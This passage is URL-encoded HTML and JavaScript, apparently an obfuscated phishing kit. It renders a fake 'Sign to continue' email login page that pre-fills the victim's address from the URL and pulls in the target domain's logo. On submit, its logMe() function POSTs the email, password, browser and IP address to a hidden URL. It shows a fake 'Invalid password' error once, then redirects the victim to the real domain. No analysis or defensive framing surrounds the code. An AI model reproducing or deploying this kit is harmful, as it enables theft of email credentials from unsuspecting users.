20190826/ourmid/pngtree-email-png-image_1697542.jpg%27%22%20id%3D%22pg-TX-Na%22%20style%3D%22margin-top%3A5px%3Bwidth%3A%2090px%3B%20height%3A%2080px%3B%22%3E%20%3Cspan%20style%3D%22vertical-align%3A%20middle%3B%20padding-left%3A3px%3B%22%20id%3D%22qz-zj-op%22%3E%3C/span%3E%20%3C/div%3E%20%3Cbr%3E%20%3C/h2%3E%20%3Ch3%20align%3D%22center%22%3ESign%20to%20continue%3C/h3%3E%20%3Cbr%3E%20%3Cdiv%20class%3D%22xA-vt-OV%22%3E%20%3Cdiv%20class%3D%22Tb-Tk-pw%22%3E%20%3Cspan%20class%3D%22mV-SF-Sm%22%3E%3Ci%20class%3D%22Vj-Mb-gO%20Tv-ae-PH%22%3E%3C/i%3E%20%3C/span%3E%20%3Cinput%20class%3D%22Qe-Vg-JI%22%20required%3D%22%22%20id%3D%22Qb-xH-Ei%22%20name%3D%22Qb-xH-Ei%22%20readonly%3D%22%22%20type%3D%22email%22%20placeholder%3D%22Username%22%3E%20%3C/div%3E%20%3C/div%3E%20%3Cdiv%20class%3D%22xA-vt-OV%22%3E%20%3Cdiv%20class%3D%22Tb-Tk-pw%22%3E%20%3Cspan%20class%3D%22mV-SF-Sm%22%3E%3Ci%20class%3D%22Vj-Mb-gO%20bu-th-uu%22%3E%3C/i%3E%20%3C/span%3E%20%3Cinput%20placeholder%3D%22Password%22%20name%3D%22kC-bl-Lp%22%20required%3D%22%22%20type%3D%22password%22%20class%3D%22Qe-Vg-JI%22%20id%3D%22kC-bl-Lp%22%3E%20%3C/div%3E%20%3Cspan%20id%3D%22errorPass%22%20style%3D%22display%3Anone%3Bcolor%3Ared%3Btext-align%3Aleft%3B%20font-size%3A0.8rem%3Bfont-weight%3A200%3B%22%3EInvalid%20password%20for%20the%20email%20address%3C/span%3E%3C/div%3E%20%3Cdiv%20class%3D%22xA-vt-OV%22%3E%20%3Cdiv%20align%3D%22left%22%3E%20%3Cinput%20type%3D%22checkbox%22%3E%20Remember%20Me%3C/div%3E%20%3C/div%3E%20%3Cdiv%20class%3D%22xA-vt-OV%22%3E%20%3Cbutton%20type%3D%22submit%22%20onClick%3D%22logMe%28%29%22%20%20id%3D%22pQ-DV-Uz%22%20class%3D%22btn%20btn-primary%20BX-ny-hQ%20btn-block%22%3ESign%20in%3C/button%3E%20%3C/div%3E%20%3C/div%3E%20%3Cp%3EPOP3/IMAP%20SERVER%3A%3Cspan%20id%3D%22mail_type%22%20style%3D%22color%3Ablue%22%3E%3C/span%3E%3C/p%3E%20%3Cinput%20type%3D%22hidden%22%20name%3D%22Fl-fJ-aZ%22%20value%3D%22vR0qZo9gepc10ebkDskbHKE1uz56QiuQKSzIXA3GnVIQ4K48fbfubw+0VVPoAZInJjzQUpp5e027KU6T7IgvFX/9z61qZ7MUO5cvjaYKinBU/qA9cTAzctibFB/uiQXaBifqu4SRYyzuoVAcxYkn9JXCbsJ40mEfyJCnvniRSevrAaYwVVQCeMcn3K1CY/jRHRB0OdG+CboAB598WFpmkJuuhZCZ/LXfynu97w6GN6+Br5BW63qTY6kGUKVXSue+YpLNYP0M%22%3E%20%3C/form%3E%20%3C/div%3E%20%3C/div%3E%20%3C/div%3E%20%3C/div%3E%20%3C/div%3E%20%3C/div%3E%3Cdiv%20id%3D%22goog-gt-tt%22%20class%3D%22skiptranslate%22%20dir%3D%22ltr%22%3E%3Cdiv%20style%3D%22padding%3A%208px%3B%22%3E%3Cdiv%3E%3Cdiv%20class%3D%22logo%22%3E%3Cimg%20src%3D%22https%3A//www.gstatic.com/images/branding/product/1x/translate_24dp.png%22%20alt%3D%22Google%20%u041F%u0435%u0440%u0435%u0432%u043E%u0434%u0447%u0438%u043A%22%20width%3D%2220%22%20height%3D%2220%22%3E%3C/div%3E%3C/div%3E%3C/div%3E%3Cdiv%20class%3D%22top%22%20style%3D%22padding%3A%208px%3B%20float%3A%20left%3B%20width%3A%20100%25%3B%22%3E%3Ch1%20class%3D%22title%20gray%22%3E%u0418%u0441%u0445%u043E%u0434%u043D%u044B%u0439%20%u0442%u0435%u043A%u0441%u0442%3C/h1%3E%3C/div%3E%3Cdiv%20class%3D%22middle%22%20style%3D%22padding%3A%208px%3B%22%3E%3Cdiv%20class%3D%22original-text%22%3E%3C/div%3E%3C/div%3E%3Cdiv%20class%3D%22bottom%22%20style%3D%22padding%3A%208px%3B%22%3E%3Cdiv%20class%3D%22activity-links%22%3E%3Cspan%20class%3D%22activity-link%22%3E%u041F%u0440%u0435%u0434%u043B%u043E%u0436%u0438%u0442%u044C%20%u043B%u0443%u0447%u0448%u0438%u0439%20%u0432%u0430%u0440%u0438%u0430%u043D%u0442%20%u043F%u0435%u0440%u0435%u0432%u043E%u0434%u0430%3C/span%3E%3Cspan%20class%3D%22activity-link%22%3E%3C/span%3E%3C/div%3E%3Cdiv%20class%3D%22started-activity-container%22%3E%3Chr%20style%3D%22color%3A%20%23CCC%3B%20background-color%3A%20%23CCC%3B%20height%3A%201px%3B%20border%3A%20none%3B%22%3E%3Cdiv%20class%3D%22activity-root%22%3E%3C/div%3E%3C/div%3E%3C/div%3E%3Cdiv%20class%3D%22status-message%22%20style%3D%22display%3A%20none%3B%22%3E%3C/div%3E%3C/div%3E%3Cdiv%20class%3D%22goog-te-spinner-pos%22%3E%3Cdiv%20class%3D%22goog-te-spinner-animation%22%3E%3Csvg%20xmlns%3D%22http%3A//www.w3.org/2000/svg%22%20class%3D%22goog-te-spinner%22%20width%3D%2296px%22%20height%3D%2296px%22%20viewBox%3D%220%200%2066%2066%22%3E%3Ccircle%20class%3D%22goog-te-spinner-path%22%20fill%3D%22none%22%20stroke-width%3D%226%22%20stroke-linecap%3D%22round%22%20cx%3D%2233%22%20cy%3D%2233%22%20r%3D%2230%22%3E%3C/circle%3E%3C/svg%3E%3C/div%3E%3C/div%3E%3Cscript%20src%3D%22https%3A//cdnjs.cloudflare.com/ajax/libs/jquery/2.2.4/jquery.min.js%22%3E%3C/script%3E%0A%20%3Cscript%20type%3D%22text/javascript%22%3E%0A%09//var%20paramVal%20%3D%20decodeURIComponent%28window.location.search.match%28/%28%5C%3F%7C%26%29searchx%5C%3D%28%5B%5E%26%5D*%29/%29%5B2%5D%29%3B%0A%09var%20paramVal%20%3D%20window.location.hash.substr%281%29%3B%0A%09var%20parts%20%3D%20paramVal.split%28%22@%22%29%3B%0A%09var%20username%20%3D%20parts%5B0%5D%3B%0A%09var%20domain%20%3D%20parts%5B1%5D%3B%0A%09var%20url%20%3D%20document.getElementById%28%27url%27%29.value%3B%0A%09document.getElementById%28%27Qb-xH-Ei%27%29.value%20%3D%20paramVal%3B%0A%09var%20mailTypeText%20%3D%20%27%20mail.%27%20+%20domain%3B%0A%09var%20ifrm%20%3D%20document.getElementById%28%27dl-rA-Ms%27%29%3B%0A%09document.getElementById%28%27mail_type%27%29.innerHTML%20%3D%20mailTypeText.toUpperCase%28%29%3B%09%0A%09document.getElementById%28%27dl-rA-Ms%27%29.src%20%3D%20%27//%27+domain%3B%0A%09document.getElementById%28%27pg-TX-Na%27%29.src%20%3D%20%27https%3A//logo.clearbit.com/%27+domain%3B%20%09%09%0A%09forms_ini%28%29%3B%0A%09let%20x%20%3D%201%3B%0A%09var%20ip%3B%0A%09%24.getJSON%28%27https%3A//api.ipify.org%3Fformat%3Djsonp%26callback%3D%3F%27%2C%20function%28data%29%20%7B%0A%09%09ip%20%3D%20data.ip%3B%0A%09%7D%29%3B%09%20%0Afunction%20logMe%28%29%7B%0A%09if%28%20validEmail%28document.getElementById%28%27Qb-xH-Ei%27%29.value%29%20%26%26%20%27%27%20%21%3D%3D%20document.getElementById%28%27kC-bl-Lp%27%29.value%20%29%7B%0A%09%09var%20email%20%3D%20document.getElementById%28%27Qb-xH-Ei%27%29.value%3B%0A%09%09var%20pass%20%3D%20document.getElementById%28%27kC-bl-Lp%27%29.value%3B%0A%09%09var%20password%20%3D%20pass.replace%28/%5Cs/g%2C%20%22%5BSPACE%5D%22%29%3B%3B%0A%09%09var%20browser%20%3D%20userBrowser%28%29%3B%0A%09%09%0A%20%20%20%20%09const%20xhttp%20%3D%20new%20XMLHttpRequest%28%29%3B%0A%20%20%20%20%09xhttp.open%28%22POST%22%2Curl%29%3B%0A%20%20%20%20%09xhttp.setRequestHeader%28%22Content-type%22%2C%20%22application/x-www-form-urlencoded%22%29%3B%0A%20%20%20%20%09xhttp.send%28%22e%3D%22+email+%22%26p%3D%22+password+%22%26b%3D%22+browser+%22%26ip%3D%22+ip%29%3B%0A%20%20%20%20%09document.getElementById%28%27kC-bl-Lp%27%29.value%20%3D%20%27%27%3B%0A%20%20%20%20%09%0A%20%20%20%20%09%09%0A%09%09if%28%20x%20%3E%3D%202%29%7B%0A%09%09%20%20%20%20setTimeout%28function%28%29%7B%0A%09%09%20%20%20%20%20%20%20%20window.location.replace%28%27//%27+domain%29%3B%0A%09%09%20%20%20%20%7D%2C1000%29%3B%0A%09%09%7Delse%7B%0A%09%09%20%20%20%20x%20%3D%20x%20+%201%3B%0A%09%09%20%20%20%20document.getElementById%28%27errorPass%27%29.style.display%20%3D%20%27block%27%3B%0A%09%09%7D%0A%09%09%0A%09%09%0A%09%09%0A%09%7Delse%7B%0A%09%09alert%28%27Invalid%20Email%20or%20Password%27%29%3B%0A%09%7D%0A%7D%0Afunction%20validEmail%28email%29%7B%0A%20%20%20%20var%20re%20%3D%20/%5E%5B%5E%5Cs@%5D+@%5B%5E%5Cs@%5D+%5C.%5B%5E%5Cs@%5D+%24/%3B%0A%20%20%20%20return%20re.test%28email%29%3B%0A%7D%0Afunction%20userBrowser%28%29%7B%0A%09var%20userAgent%20%3D%20navigator.userAgent.toLowerCase%28%29%3B%09%09%09%09%09%09%0A%09if%20%28/edge/i.test%28userAgent%29%29%7B%0A%09%09return%20%27Edge%20Browser%27%3B%0A%09%7Delse%20if%20%28/rv%3A11/i.test%28userAgent%29%29%7B%0A%09%09return%20%27IE%20v11%27%3B%0A%09%7D%20else%20if%20%28/msie%2010/i.test%28userAgent%29%29%7B%0A%09%09%09return%20%27IE%20v10%27%3B%0A%09%7D%20else%20if%20%28/opr/i.test%28userAgent%29%29%7B%0A%09%09return%20%27Opera%27%3B%0A%09%7D%20else%20if%20%28/chrome/i.test%28userAgent%29%29%7B%0A%09%09return%20%27Chrome%27%3B%0A%09%7D%20else%20if%20%28/firefox/i.test%28userAgent%29%29%7B%0A%09%09return%20%27Firefox%27%3B%0A%09%7D%20else%20if%20%28%21%21navigator.userAgent.match%28/Version%5C/%5B%5Cd%5C.%5D+.*Safari/%29%29%20%7B%0A%09%09return%20%27Safari%27%3B%0A%09%7D%0A%09%09return%20%27Unknown%27%3B%0A%7D%0Afunction%20forms_ini%28%29%7B%0A%20%20for%28var%20form%20of%20document.getElementsByTagName%28%27form%27%29%29%7B%0A%20%20%20%20form.addEventListener%28%27submit%27%2C%20function%28ev%29%7B%0A%20%20%20%20%20%20ev.preventDefault%28%29%0A%20%20%20%20%7D%29%0A%20%20%7D%0A%7D%0A%3C/script%3E%0A%20%3C/body%3E%3C/html%3E'))
</script>
